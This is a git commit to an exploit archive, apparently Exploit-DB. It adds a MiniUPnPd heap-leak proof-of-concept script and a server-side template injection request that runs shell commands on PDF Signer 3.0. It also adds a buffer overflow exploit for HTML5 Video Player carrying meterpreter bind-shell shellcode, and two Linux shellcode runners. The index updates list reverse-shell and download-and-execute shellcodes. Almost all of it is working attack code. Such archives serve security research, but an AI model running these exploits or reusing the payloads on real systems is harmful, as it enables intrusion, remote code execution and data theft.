DB: 2019-01-30

5 changes to exploits/shellcodes MiniUPnPd 2.1 - Out-of-Bounds Read MySQL User-Defined (Linux) x32 / x86_64 - sys_exec Function Local Privilege Escalation MySQL User-Defined (Linux) (x32/x86_64) - 'sys_exec' Local Privilege Escalation HTML5 Video Player 1.2.5 - Local Buffer Overflow - Non SEH CloudMe Sync 1.11.2 Buffer Overflow - WoW64 - (DEP Bypass) CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass) PDF Signer 3.0 - SSTI to RCE via CSRF Cookie Linux/x86 - execve() - Terminal Calculator (bc) Shellcode (53 bytes) Linux/ARM - Reverse TCP (/bin/sh) - 192.168.1.124:4321 Shellcode (64 bytes) Linux/ARM - Bind TCP (/bin/sh)-0.0.0.0:4321 Null Free Shellcode (84 bytes) Linux/ARM - Reverse TCP (192.168.1.124:4321) Shell (/bin/sh) Shellcode (64 bytes) Linux/ARM - Bind TCP (0.0.0.0:4321) Shell (/bin/sh) + Null-Free Shellcode (84 bytes) Linux/x86 - execve(/bin/sh) + RShift-1 Encoded Shellcode (29 bytes)
2019-01-30 05:01:46 +00:00 · 2019-01-30 05:01:46 +00:00 · ed58accc5a
commit ed58accc5a
parent b68cbec24d
7 changed files with 299 additions and 4 deletions
--- a/exploits/linux/dos/46278.py
+++ b/exploits/linux/dos/46278.py
@ -0,0 +1,57 @@
+#!/usr/bin/python3
+# miniupnpd <= v2.1 read out-of-bounds PoC
+# by b1ack0wl
+# https://github.com/b1ack0wl/miniupnpd_poc
+
+import requests, socketserver, argparse, sys
+
+class OK_HTTP_Response(socketserver.StreamRequestHandler):
+  def handle(self):
+    self.request.settimeout(self.server.timeout)
+    self.server.notify = b""
+    try:
+      line = self.rfile.read(1)
+      while len(line) > 0:
+        self.server.notify += line
+        line = self.rfile.read(1)
+    except:
+      pass
+    self.wfile.write(b"HTTP/1.1 200 OK\r\n\r\n")
+
+def splash():
+  print("[*] miniupnpd <= v2.1 read out-of-bounds vulnerability [PoC]")
+  print("[*] by b1ack0wl")
+
+def leak_data(args):
+  leak_size = ((1024*args.leak_amount)+526)
+  callback_uri= "A" * leak_size
+  headers= {'NT': 'upnp:event', 'Callback': '<http://{}:{}/{}>'.format(args.callback_ip,args.callback_port,callback_uri), 'Timeout': 'Second-20'}
+  server = socketserver.TCPServer((args.callback_ip, args.callback_port), OK_HTTP_Response)
+  server.timeout = args.timeout
+  print("[+] Sending request...")
+  requests.request(method="SUBSCRIBE",url="http://{}:{}/evt/L3F".format(args.target_ip,args.target_port),headers=headers,timeout=args.timeout)
+  server.handle_request()
+  leaked_data = server.notify[1023::] # Skip over the first 1024 bytes since it just contains 'NOTIFY /AAA...'
+  print("[+] Leaked Data: {}".format(leaked_data))
+  print("[+] Leaked Length: {}".format(len(leaked_data)))
+  print("[+] Done")
+
+def main():
+  poc_parser = argparse.ArgumentParser( add_help=True, description='Miniupnpd <= v2.1 read out-of-bounds vulnerability',formatter_class=argparse.ArgumentDefaultsHelpFormatter)
+  poc_parser.add_argument('target_ip', help='IP address of vulnerable device.')
+  poc_parser.add_argument('target_port', default=5000, help="Target Port.", type=int)
+  poc_parser.add_argument('--callback_ip', help="Local IP address for httpd listener.", type=str)
+  poc_parser.add_argument('--callback_port', help="Local port for httpd listener.", type=int)
+  poc_parser.add_argument('--timeout', default=5, help="Timeout for http requests (in seconds).", type=float)
+  poc_parser.add_argument('--leak_amount', default=1, help="Amount of arbitrary heap data to leak (in KB).", type=int)
+  args = poc_parser.parse_args()
+  arguments = ['target_ip', 'target_port', 'callback_ip', 'callback_port' ]
+  for i in arguments:
+    if getattr(args, i) == None:
+      poc_parser.print_help()
+      sys.exit(1)
+  leak_data(args)
+
+if __name__ == '__main__':
+    splash()
+    main()
--- a/exploits/php/webapps/46276.txt
+++ b/exploits/php/webapps/46276.txt
@ -0,0 +1,70 @@
+# Exploit Title: PDF Signer v3.0 - SSTI to RCE via CSRF Cookie
+# Dork: N/A
+# Date: 2019-01-28
+# Exploit Author: dd_ (info@malicious.group)
+# Vendor Homepage: https://codecanyon.net/user/simcy_creative
+# Software Link: https://codecanyon.net/item/signer-create-digital-signatures-and-sign-pdf-documents-online/20737707
+# Version: v3.0
+# Tested on: PHP/MySQL (PHP 7.2 / MySQL 5.7.25-0ubuntu0.18.04.2-log)
+# Vendor Banner: Signer v3.0 – Create Digital signatures and Sign PDF documents
+# Research IRC: irc.blackcatz.org #blackcatz
+
+# Vulnerability: Server-Side Template Injection leading to Remote Command Execution due to improper Cookie handling and improper CSRF implementation.
+
+# POC:
+# 1)
+
+GET / HTTP/1.1
+Host: signer.local
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Referer: http://signer.local/signin/?secure=true
+Connection: close
+Cookie: CSRF-TOKEN=rnqvt{{[PHP_COMMAND_HERE]}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl
+Upgrade-Insecure-Requests: 1
+
+# Example
+
+[REQUEST]
+
+GET / HTTP/1.1
+Host: signer.local
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Referer: http://signer.local/signin/?secure=true
+Connection: close
+Cookie: CSRF-TOKEN=rnqvt{{shell_exec('ls -lah')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl
+Upgrade-Insecure-Requests: 1
+
+[RESPONSE]
+
+--half way down page---snip--
+
+<label>Folder name</label>
+<input type="text" class="form-control" name="foldername" placeholder="Folder name" data-parsley-required="true">
+<input type="hidden" name="folder" value="1">
+<input type="hidden" name="folderid">
+<input type="hidden" name="csrf-token" value="rnqvttotal 112K
+drwxr-xr-x  9 www-data www-data 4.0K Jan 28 12:04 .
+drwxr-xr-x  6 www-data www-data 4.0K Jan 28 06:19 ..
+-rw-r--r--  1 www-data www-data 1.1K Jan 28 12:03 .env
+-rw-r--r--  1 www-data www-data  532 Jan  9 20:52 .htaccess
+drwxr-xr-x  9 www-data www-data 4.0K Jan  9 20:53 assets
+-rw-r--r--  1 www-data www-data  947 Jan  9 20:52 composer.json
+-rw-r--r--  1 www-data www-data  54K Jan  9 20:52 composer.lock
+drwxr-xr-x  2 www-data www-data 4.0K Jan 28 11:59 config
+-rw-r--r--  1 www-data www-data 1.7K Jan  9 20:52 cron.php
+-rw-r--r--  1 www-data www-data  169 Jan  9 20:52 index.php
+drwxr-xr-x  3 www-data www-data 4.0K Jan  9 20:53 lang
+drwxr-xr-x  6 www-data www-data 4.0K Jan 28 11:46 src
+drwxr-xr-x  9 www-data www-data 4.0K Jan  9 20:53 uploads
+drwxr-xr-x 24 www-data www-data 4.0K Jan  9 20:53 vendor
+drwxr-xr-x  6 www-data www-data 4.0K Jan  9 20:53 views
+to5gw" />
+</div>
+</div>
+</div>
+
+--- snip ---
--- a/exploits/windows/local/46279.py
+++ b/exploits/windows/local/46279.py
@ -0,0 +1,60 @@
+#!/usr/bin/python
+# Exploit Title: HTML5 Video Player 1.2.5 - Local Buffer Overflow - Non SEH
+# Date: 27/01/2019
+# Exploit Author: Dino Covotsos - Telspace Systems
+# Vendor Homepage: http://www.html5videoplayer.net/download.html
+# Software: http://www.html5videoplayer.net/html5videoplayer-setup.exe
+# Contact: services[@]telspace.co.za
+# Twitter: @telspacesystems
+# Version: 1.2.5
+# Tested on: Windows XP Prof SP3 ENG x86
+# Note: No SEH exploitation required (SEH exploit for Windows XP SP3 by Kagan Capar available on exploit-db)
+# CVE: TBC from Mitre
+# Created in preparation for OSCE - DC - Telspace Systems
+# PoC:
+# 1.) Generate exploit.txt, copy the contents to clipboard
+# 2.) In application, open 'Help' then 'Register'
+# 3.) Paste the contents of exploit.txt under 'KEY CODE'
+# 4.) Click OK - Calc POPS!
+# Extra Info:
+#Exact match 996 = For free registration (Fill buffer with ABCD's to get free full registration)
+#Exact match 997 = For buffer overflow
+#JMP ESP 0x7cb32d69  shell32.dll
+
+#msfvenom -p windows/meterpreter/bind_tcp LPORT=443 -e x86/shikata_ga_nai -b "\x00\xd5\x0a\x0d\x1a" -f c
+#(binds meterpreter to port 443)
+
+shellcode = ("\xdb\xc9\xbf\xab\x95\xb6\x9c\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
+"\x4e\x83\xe8\xfc\x31\x78\x14\x03\x78\xbf\x77\x43\x60\x57\xf5"
+"\xac\x99\xa7\x9a\x25\x7c\x96\x9a\x52\xf4\x88\x2a\x10\x58\x24"
+"\xc0\x74\x49\xbf\xa4\x50\x7e\x08\x02\x87\xb1\x89\x3f\xfb\xd0"
+"\x09\x42\x28\x33\x30\x8d\x3d\x32\x75\xf0\xcc\x66\x2e\x7e\x62"
+"\x97\x5b\xca\xbf\x1c\x17\xda\xc7\xc1\xef\xdd\xe6\x57\x64\x84"
+"\x28\x59\xa9\xbc\x60\x41\xae\xf9\x3b\xfa\x04\x75\xba\x2a\x55"
+"\x76\x11\x13\x5a\x85\x6b\x53\x5c\x76\x1e\xad\x9f\x0b\x19\x6a"
+"\xe2\xd7\xac\x69\x44\x93\x17\x56\x75\x70\xc1\x1d\x79\x3d\x85"
+"\x7a\x9d\xc0\x4a\xf1\x99\x49\x6d\xd6\x28\x09\x4a\xf2\x71\xc9"
+"\xf3\xa3\xdf\xbc\x0c\xb3\x80\x61\xa9\xbf\x2c\x75\xc0\x9d\x38"
+"\xba\xe9\x1d\xb8\xd4\x7a\x6d\x8a\x7b\xd1\xf9\xa6\xf4\xff\xfe"
+"\xc9\x2e\x47\x90\x34\xd1\xb8\xb8\xf2\x85\xe8\xd2\xd3\xa5\x62"
+"\x23\xdc\x73\x1e\x28\x7b\x2c\x3d\xd3\x11\xcd\xab\x2e\x8d\x27"
+"\x24\xf0\xad\x47\xee\x99\x45\xba\x11\xa7\x2e\x33\xf7\xcd\x40"
+"\x12\xaf\x79\xa2\x41\x78\x1d\xdd\xa3\x02\x21\x54\x14\x5a\xca"
+"\x21\x4d\x5c\xf5\xb2\x5b\xca\x61\x38\x88\xce\x90\x3f\x85\x66"
+"\xc4\xd7\x53\xe7\xa7\x46\x63\x22\x5d\x88\xf1\xc9\xf4\xdf\x6d"
+"\xd0\x21\x17\x32\x2b\x04\x24\x35\xd3\xd9\x07\x4d\xe2\x4f\x17"
+"\x39\x0b\x80\x97\xb9\x5d\xca\x97\xd1\x39\xae\xc4\xc4\x45\x7b"
+"\x79\x55\xd0\x84\x2b\x09\x73\xed\xd1\x74\xb3\xb2\x2a\x53\xc7"
+"\xb5\xd4\x22\xcf\x44\x17\xf3\x09\x33\x7e\xc7\x2d\x4c\x35\x6a"
+"\x07\xc7\x35\x38\x57\xc2")
+buffer = "A" * 996 + "\x69\x2d\xb3\x7c" + "\x90" * 20 + shellcode
+
+payload = buffer
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6275,6 +6275,7 @@ id,file,description,date,author,type,platform,port
 46248,exploits/multiple/dos/46248.c,"iOS/macOS - 'task_swap_mach_voucher()' Use-After-Free",2019-01-25,"Google Security Research",dos,multiple,
 46261,exploits/hardware/dos/46261.sh,"Sricam gSOAP 2.8 - Denial of Service",2019-01-28,"Andrew Watson",dos,hardware,5000
 46272,exploits/windows/dos/46272.py,"Smart VPN 1.1.3.0 - Denial of Service (PoC)",2019-01-28,0xB9,dos,windows,
+46278,exploits/linux/dos/46278.py,"MiniUPnPd 2.1 - Out-of-Bounds Read",2019-01-29,b1ack0wl,dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10246,11 +10247,12 @@ id,file,description,date,author,type,platform,port
 46189,exploits/windows/local/46189.txt,"Check Point ZoneAlarm 8.8.1.110 - Local Privilege Escalation",2019-01-17,"Chris Anastasio",local,windows,
 46222,exploits/windows/local/46222.txt,"Microsoft Windows CONTACT - HTML Injection / Remote Code Execution",2019-01-23,hyp3rlinx,local,windows,
 46241,exploits/linux/local/46241.rb,"AddressSanitizer (ASan) - SUID Executable Privilege Escalation (Metasploit)",2019-01-24,Metasploit,local,linux,
-46249,exploits/linux/local/46249.py,"MySQL User-Defined (Linux) x32 / x86_64 - sys_exec Function Local Privilege Escalation",2019-01-28,d7x,local,linux,
+46249,exploits/linux/local/46249.py,"MySQL User-Defined (Linux) (x32/x86_64) - 'sys_exec' Local Privilege Escalation",2019-01-28,d7x,local,linux,
 46255,exploits/windows/local/46255.py,"Easy Video to iPod Converter 1.6.20 - Buffer Overflow (SEH)",2019-01-28,"Nawaf Alkeraithe",local,windows,
 46265,exploits/windows/local/46265.py,"R 3.4.4 XP SP3 - Buffer Overflow (Non SEH)",2019-01-28,"Dino Covotsos",local,windows,
 46267,exploits/windows/local/46267.py,"BEWARD Intercom 2.3.1 - Credentials Disclosure",2019-01-28,LiquidWorm,local,windows,
 46269,exploits/windows/local/46269.py,"Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass)",2019-01-28,bzyo,local,windows,
+46279,exploits/windows/local/46279.py,"HTML5 Video Player 1.2.5 - Local Buffer Overflow - Non SEH",2019-01-29,"Dino Covotsos",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17126,7 +17128,7 @@ id,file,description,date,author,type,platform,port
 46218,exploits/windows/remote/46218.py,"CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt",2019-01-22,T3jv1l,remote,windows,8888
 46220,exploits/windows/remote/46220.txt,"Microsoft Windows VCF or Contact' File - URL Manipulation-Spoof Arbitrary Code Execution",2019-01-22,"Eduardo Braun Prado",remote,windows,
 46242,exploits/linux/remote/46242.txt,"Ghostscript 9.26 - Pseudo-Operator Remote Code Execution",2019-01-24,"Google Security Research",remote,linux,
-46250,exploits/windows_x86-64/remote/46250.py,"CloudMe Sync 1.11.2 Buffer Overflow - WoW64 - (DEP Bypass)",2019-01-28,"Matteo Malvica",remote,windows_x86-64,
+46250,exploits/windows_x86-64/remote/46250.py,"CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)",2019-01-28,"Matteo Malvica",remote,windows_x86-64,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -40748,3 +40750,4 @@ id,file,description,date,author,type,platform,port
 46271,exploits/php/webapps/46271.txt,"Mess Management System 1.0 - SQL Injection",2019-01-28,"Ihsan Sencan",webapps,php,80
 46273,exploits/php/webapps/46273.txt,"MyBB IP History Logs Plugin 1.0.2 - Cross-Site Scripting",2019-01-28,0xB9,webapps,php,80
 46274,exploits/php/webapps/46274.txt,"ResourceSpace 8.6 - 'collection_edit.php' SQL Injection",2019-01-28,dd_,webapps,php,80
+46276,exploits/php/webapps/46276.txt,"PDF Signer 3.0 - SSTI to RCE via CSRF Cookie",2019-01-29,dd_,webapps,php,80
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@ -931,7 +931,9 @@ id,file,description,date,author,type,platform
 46103,shellcodes/linux_x86/46103.c,"Linux/x86 - wget chmod execute over execve /bin/sh -c Shellcode (119 bytes)",2019-01-09,strider,shellcode,linux_x86
 46123,shellcodes/generator/46123.py,"Windows/x86 - Download With TFTP And Execute Shellcode (51-60 bytes) (Generator)",2019-01-11,"Semen Alexandrovich Lyhin",shellcode,generator
 46166,shellcodes/linux_x86/46166.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (100 bytes)",2019-01-15,"Joao Batista",shellcode,linux_x86
+46275,shellcodes/linux_x86/46275.c,"Linux/x86 - execve() - Terminal Calculator (bc) Shellcode (53 bytes)",2019-01-29,"Daniele Votta",shellcode,linux_x86
 46256,shellcodes/linux_x86/46256.c,"Linux/x86 - exit(0) Shellcode (5 bytes)",2019-01-28,"Daniele Votta",shellcode,linux_x86
 46257,shellcodes/linux_x86/46257.c,"Linux/x86 - Read /etc/passwd Shellcode (58 Bytes) (2)",2019-01-28,"Joao Batista",shellcode,linux_x86
-46258,shellcodes/arm/46258.s,"Linux/ARM - Reverse TCP (/bin/sh) - 192.168.1.124:4321 Shellcode (64 bytes)",2019-01-28,"Gokul Babu",shellcode,arm
-46264,shellcodes/arm/46264.s,"Linux/ARM -  Bind TCP (/bin/sh)-0.0.0.0:4321 Null Free Shellcode (84 bytes)",2019-01-28,"Gokul Babu",shellcode,arm
+46258,shellcodes/arm/46258.s,"Linux/ARM - Reverse TCP (192.168.1.124:4321) Shell (/bin/sh) Shellcode (64 bytes)",2019-01-28,"Gokul Babu",shellcode,arm
+46264,shellcodes/arm/46264.s,"Linux/ARM -  Bind TCP (0.0.0.0:4321) Shell (/bin/sh) + Null-Free Shellcode (84 bytes)",2019-01-28,"Gokul Babu",shellcode,arm
+46277,shellcodes/linux_x86/46277.c,"Linux/x86 - execve(/bin/sh) + RShift-1 Encoded Shellcode (29 bytes)",2019-01-29,"Joao Batista",shellcode,linux_x86
--- a/shellcodes/linux_x86/46275.c
+++ b/shellcodes/linux_x86/46275.c
@ -0,0 +1,63 @@
+/*
+; Date: 27/01/2019
+; Execve_Calc.asm
+; Author: Daniele Votta
+; Description: This program invoke excve to run terminal calculator (bc).
+; Tested on: i686 GNU/Linux
+; Shellcode Length:53
+; JMP | CALL | POP | Techniques
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+/*
+; Execve_Calc:     file format elf32-i386
+;
+; Disassembly of section .text:
+; 08048080 <_start>:
+; 8048080:	eb 1a                	jmp    804809c <call_shellcode>
+;
+; 08048082 <shellcode>:
+; 8048082:	5e                   	pop    esi
+; 8048083:	31 db                	xor    ebx,ebx
+; 8048085:	88 5e 0b             	mov    BYTE PTR [esi+0xb],bl
+; 8048088:	89 76 0c             	mov    DWORD PTR [esi+0xc],esi
+; 804808b:	89 5e 10             	mov    DWORD PTR [esi+0x10],ebx
+; 804808e:	8d 1e                	lea    ebx,[esi]
+; 8048090:	8d 4e 0c             	lea    ecx,[esi+0xc]
+; 8048093:	8d 56 10             	lea    edx,[esi+0x10]
+; 8048096:	31 c0                	xor    eax,eax
+; 8048098:	b0 0b                	mov    al,0xb
+; 804809a:	cd 80                	int    0x80
+;
+; 0804809c <call_shellcode>:
+; 804809c:	e8 e1 ff ff ff       	call   8048082 <shellcode>
+;
+; 080480a1 <message>:
+; 80480a1:	2f                   	das    
+; 80480a2:	75 73                	jne    8048117 <_end+0x5f>
+; 80480a4:	72 2f                	jb     80480d5 <_end+0x1d>
+; 80480a6:	62 69 6e             	bound  ebp,QWORD PTR [ecx+0x6e]
+; 80480a9:	2f                   	das    
+; 80480aa:	62 63 41             	bound  esp,QWORD PTR [ebx+0x41]
+; 80480ad:	42                   	inc    edx
+; 80480ae:	42                   	inc    edx
+; 80480af:	42                   	inc    edx
+; 80480b0:	42                   	inc    edx
+; 80480b1:	43                   	inc    ebx
+; 80480b2:	43                   	inc    ebx
+; 80480b3:	43                   	inc    ebx
+; 80480b4:	43                   	inc    ebx
+======================= POC Daniele Votta =======================
+*/
+
+unsigned char shellcode[] = \
+"\xeb\x1a\x5e\x31\xdb\x88\x5e\x0b\x89\x76\x0c\x89\x5e\x10\x8d\x1e\x8d\x4e\x0c\x8d\x56\x10\x31\xc0\xb0\x0b\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x62\x63\x41\x42\x42\x42\x42\x43\x43\x43\x43";
+
+int main()
+{
+	printf("Shellcode Length:  %d\n", strlen(shellcode));
+	int (*ret)() = (int(*)())shellcode;
+	ret();
+}
--- a/shellcodes/linux_x86/46277.c
+++ b/shellcodes/linux_x86/46277.c
@ -0,0 +1,40 @@
+/*
+# Title : Linux/x86 - execve(/bin/sh) + RShift-1 Encoded Shellcode (29 bytes)
+# Author : Joao Batista
+# Date : Jan 2019
+# Tested on : i686 GNU/Linux
+# Shellcode Length : 29
+# SLAE - 1420
+
+global _start
+
+section .text
+
+_start:
+        xor ecx,ecx
+        mul ecx
+        push ecx
+        mov esi,0x34399797
+        mov edi,0x3734b117
+        shl esi,0x1
+        shl edi,0x1
+        inc esi
+        inc edi
+        push esi
+        push edi
+        xchg ebx,esp
+        mov al,0xb
+        int 0x80
+*/
+#include<stdio.h>
+#include<string.h>
+
+unsigned char shellcode[] = \
+"\x31\xc9\xf7\xe1\x51\xbe\x97\x97\x39\x34\xbf\x17\xb1\x34\x37\xd1\xe6\xd1\xe7\x46\x47\x56\x57\x87\xdc\xb0\x0b\xcd\x80";
+
+main()
+{
+        printf("shellcode length:  %d\n", strlen(shellcode));
+        int (*ret)() = (int(*)())shellcode;
+        ret();
+}